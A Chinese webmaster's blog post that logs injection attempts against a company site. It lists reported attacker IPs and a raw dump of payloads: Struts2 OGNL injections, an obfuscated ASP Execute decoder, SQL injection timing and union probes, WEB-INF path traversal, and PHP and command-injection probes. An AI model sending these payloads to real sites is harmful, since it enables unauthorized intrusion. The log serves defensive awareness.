网站注入代码记录
做为一个公司的网站管理员一个字累!防不胜防网站经常遭遇了因攻击注入非法信息,特别是asp网站程序,大量的扫描及注入代码!以下看看入侵是用什么代码注入你的网站!
恶意IP注入
108.162.215.122
162.158.58.97
172.68.132.45
172.68.141.104
172.68.141.20
172.68.142.171
172.68.47.172
173.245.48.139
172.68.132.45
172.68.141.104
172.68.141.20
172.68.141.236
172.68.142.171
172.68.47.172
173.245.48.139
173.245.48.97
180.97.106.163
180.97.106.164
180.97.106.39
180.97.106.163
180.97.106.164
180.97.106.39
000001
000001
000484
000712
000745
Execute ( Execute ( :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(bd=bd&chr(&H&c&)):Else:Execute(bd=bd&chr(&H&c&Mid(s,i+2,2)&)):i=i+2:End If&chr(10)&Next:End Function:Response.Write(->|): Execute (On Error Resume Next:&bd(526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229)):Response.Write(|<-):Response.End))
${#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}
${@print(md5(812812))}
${@print(md5(812812
%{#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close()}
%{(#test=*multipart/form-data*).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[*com.opensymphony.xwork2.ActionContext.container*]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(*text/html
(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)
(#context[xwork.MethodAccessor.denyMethodExecution]=new java.lang.Boolean(false),#_memberAccess[allowStaticMethodAccess]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)
(SELECT (CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4624=4624) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(106)||CHR(106)||CHR(118)||CHR(113)))
(SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2130=2130) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(98)||CHR(113)))
(SELECT (CHR(113)||CHR(122)||CHR(107)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (8814=8814) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(120)||CHR(112)||CHR(113)))
(SELECT (CHR(113)||CHR(98)||CHR(113)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(106)||CHR(113)))
(SELECT CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4070=4070) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(118)+CHAR(113))
(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9952=9952) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))
(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (8386=8386) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(120)+CHAR(112)+CHAR(113))
(SELECT CHAR(113)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7434=7434) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(106)+CHAR(113))
(SELECT CONCAT(0x7162716271,(SELECT (ELT(7981=7981,1))),0x7176626a71))
(SELECT CONCAT(0x7170707671,(SELECT (ELT(3194=3194,1))),0x716a6a7671))
(SELECT CONCAT(0x71767a7871,(SELECT (ELT(6582=6582,1))),0x71707a6271))
(SELECT CONCAT(0x717a6b7071,(SELECT (ELT(5363=5363,1))),0x717a787071))
*
*]
*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*
*+(#context[*xwork.MethodAccessor.denyMethodExecution*]=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2
*+(#context[xwork.MethodAccessor.denyMethodExecution]=new java.lang.Boolean(false),#_memberAccess[allowStaticMethodAccess]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+*
*+(#context[xwork.MethodAccessor.denyMethodExecution]=new java.lang.Boolean(false),#_memberAccess[allowStaticMethodAccess]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=*814F60BD-F6DF-4227-*,#b_str=*86F5-8D9FBF26A2EB*,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())2
../../WEB-INF/web.xm
../../WEB-INF/web.xml
../../WEB-INF/web
..\..\WEB-INF/web.xm
..\..\WEB-INF/web.xml
..\..\WEB-INF/web
/**/cOnVeRt(int,(char(33)+char(126)+char(33)+(char(65)+char(66)+char(67)+char(49)+char(52)+char(53)+char(90)+char(81)+char(54)+char(50)+char(68)+char(87)+char(81)+char(65)+char(70)+char(80)+char(79)+char(73)+char(89)+char(67)+char(70)+char(68))+char(33)+char(126)+char(33)))
/../../WEB-INF/web.xm
/../../WEB-INF/web.xml
/../../WEB-INF/web
/usr/bin/id
;${@print(md5(812812))};//
;${@print(md5(812812))
\..\..\WEB-INF\web.xm
\..\..\WEB-INF\web.xml
\..\..\WEB-INF\web
\\..\....\\....\\WEB-INF\web.xm
\\..\....\\....\\WEB-INF\web.xml
\\..\....\\....\\WEB-INF\web
\\..\\..\\WEB-INF\\web.xm
\\..\\..\\WEB-INF\\web.xml
\\..\\..\\WEB-INF\\web
];${@print(md5(812812))};//
];${@print(md5(812812))
=
0 ORDER BY 1#
0 ORDER BY 1#
0) ORDER BY 1#
0-(-8281*2)-8281-8281
0) ORDER BY 1#
1 ORDER BY 1#
1
1 ORDER BY 1#
1) ORDER BY 1#
1-(-8281*2)-8281-8281
1) ORDER BY 1#
1*
-1001
105 AnD BeNChMaRK(2999999,MD5(NOW()))
105&&BeNChMaRK(2999999,MD5(NOW()))
105&&SlEEp(3)
-1051
-1986
-1990
-1998
2 AnD BeNChMaRK(2999999,MD5(NOW()))
2 ORDER BY 1#
2 ORDER BY 1#
2) ORDER BY 1#
2&&BeNChMaRK(2999999,MD5(NOW()))
2&&SlEEp(3)
2-(-8281*2)-8281-8279
2-(-8281*2)-8281-8281
2) ORDER BY 1#
-2000
-2003) ORDER BY 1#
-2003
-2995
-2997
2and1=1
2AND1=1
2and1>1
3 ORDER BY 1#
3 ORDER BY 1#
3-(-8281*2)-8281-8281
3) ORDER BY 1#
-3000
-3918
392 AnD BeNChMaRK(2999999,MD5(NOW()))
392&&BeNChMaRK(2999999,MD5(NOW()))
392&&SlEEp(3)
-3921
-3994
-3998
4-(-8281*2)-8281-8281
-4001
-4003
-4102
-4104
-4111
-4112
-4113) ORDER BY 1#
-4119
-4127
-4128) ORDER BY 1#
-4553
-4557
-4558
456 AnD BeNChMaRK(2999999,MD5(NOW()))
456&&BeNChMaRK(2999999,MD5(NOW()))
456&&SlEEp(3)
-4568
-4569
-4573
-4599
460 AnD BeNChMaRK(2999999,MD5(NOW()))
460&&BeNChMaRK(2999999,MD5(NOW()))
460&&SlEEp(3)
-4604
461 AnD BeNChMaRK(2999999,MD5(NOW()))
461&&BeNChMaRK(2999999,MD5(NOW()))
461&&SlEEp(3)
-4610
-4611
-4624
-4628
463 AnD BeNChMaRK(2999999,MD5(NOW()))
463&&BeNChMaRK(2999999,MD5(NOW()))
463&&SlEEp(3)
-4633
-4669
467 AnD BeNChMaRK(2999999,MD5(NOW()))
467&&BeNChMaRK(2999999,MD5(NOW()))
467&&SlEEp(3)
-4676
-4677
467cp.asp?lx=big
-4689
-4696
-4774
-4777
478 AnD BeNChMaRK(2999999,MD5(NOW()))
478&&BeNChMaRK(2999999,MD5(NOW()))
478&&SlEEp(3)
-4789
479 AnD BeNChMaRK(2999999,MD5(NOW()))
479&&BeNChMaRK(2999999,MD5(NOW()))
479&&SlEEp(3)
-4797
-4799
-4832
-4835
484 AnD BeNChMaRK(2999999,MD5(NOW()))
484 AND SLEEP(5)-- xJzB
484 AND SLEEP(5)
484 ORDER BY 1-- FloG
484 ORDER BY 1-- rIqq
484 ORDER BY 1#
484&&BeNChMaRK(2999999,MD5(NOW()))
484&&SlEEp(3)
484-(-8281*2)-8281-8281
484)
484) ORDER BY 1-- PWWX
484) ORDER BY 1#
-4841
484cp.asp?lx=big
485?newsid=485
-4860
-4909
491 AnD BeNChMaRK(2999999,MD5(NOW()))
491&&BeNChMaRK(2999999,MD5(NOW()))
491&&SlEEp(3)
-4911
-4990
-4994
-4999
5-(-8281*2)-8281-8281
-5002
-5005
-5018
502?newsid=502
-5026
-5028
503-(-8281*2)-8281-8281
-5030
-5032
-5047
-5106
511 AnD BeNChMaRK(2999999,MD5(NOW()))
511&&BeNChMaRK(2999999,MD5(NOW()))
511&&SlEEp(3)
-5113
-5119
512 AnD BeNChMaRK(2999999,MD5(NOW()))
512&&BeNChMaRK(2999999,MD5(NOW()))
523?newsid=523
-5231
-5232
-5234
-5685) ORDER BY 1#
-5815
582 AnD BeNChMaRK(2999999,MD5(NOW()))
582&&BeNChMaRK(2999999,MD5(NOW()))
582&&SlEEp(3)
-5821
-5824
-5838
-5841
-5852
-5855
586 AnD BeNChMaRK(2999999,MD5(NOW()))
586&&BeNChMaRK(2999999,MD5(NOW()))
586&&SlEEp(3)
-5861
-5900
-5903
-5909
591 AnD BeNChMaRK(2999999,MD5(NOW()))
591&&BeNChMaRK(2999999,MD5(NOW()))
591&&SlEEp(3)
-5910
-5920
-5921
-5922
-5923
-5928
593?newsid=593
-5933
-5958
596?newsid=596
-5963
-5964
-5969
-5971) ORDER BY 1#
-5973
-5974
-5979
-5987
-5989
599 AnD BeNChMaRK(2999999,MD5(NOW()))
599&&BeNChMaRK(2999999,MD5(NOW()))
603 AnD BeNChMaRK(2999999,MD5(NOW()))
603&&BeNChMaRK(2999999,MD5(NOW()))
603&&SlEEp(3)
-6030
-6031
-6037
-6039
-6044
-6046
-6047
-6049
-6051
-6056
-6069
607?bookid=607
-6072
-6074
-6077
-6080
-6088
-6091
-6093
-6094
-6096) ORDER BY 1#
-6098
-6144
615 ORDER BY 1#
615-(-8281*2)-8281-8281
615) ORDER BY 1#
-6174
-6179
618-(-8281*2)-8281-8281
-6184
-6189
619 ORDER BY 1#
619 ORDER BY 1#
619) ORDER BY 1#
619-(-8281*2)-8281-8281
619) ORDER BY 1#
619?newsid=619
-6190
-6192
-6194
-6199
620?newsid=620
-6206
-6207
-6210
622?newsid=622
-6224
-6257
-6259
626 AnD BeNChMaRK(2999999,MD5(NOW()))
626&&BeNChMaRK(2999999,MD5(NOW()))
626&&SlEEp(3)
-6261
-6266) ORDER BY 1#
-6266
-6267
-9981
-9986
-9987
-9989
-9992
-9994
-9995
BchR1FPK
big ORDER BY 1#
big ORDER BY 1#
big) ORDER BY 1#
big&
big) ORDER BY 1#
command
data://text/plain
Execute ( Execute ( :Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(bd=bd&chr(&H&c&)):Else:Execute(bd=bd&chr(&H&c&Mid(s,i+2,2)&)):i=i+2:End If&chr(10)&Next:End Function:Response.Write(->|): Execute (On Error Resume Next:&bd(526573706F6E73652E5772697465282268616F72656E67652E636F6D51513331373237353733382229)):Response.Write(|<-):Response.End))
set
string:{var_dump(md5(81281
string:{var_dump(md5(812812))}
UTF-8
WEB-INF/
WEB-INF/web.xm
WEB-INF/web.xml
WEB-INF/web
WEB-INF\web.xm
WEB-INF\web.xml
WEB-INF\web
x||set||x
总之,特殊字符用得最多!
- 手机访问: http://114.cq3a.com/news/4923.html
- 上一篇: 《复联4》电影成票房冠军《何以为家》成最大黑马
- 下一篇: iPhone苹果手机夸大电池续航时间
- 本站搜:网站注入代码记录
- 百度一下: 网站注入代码记录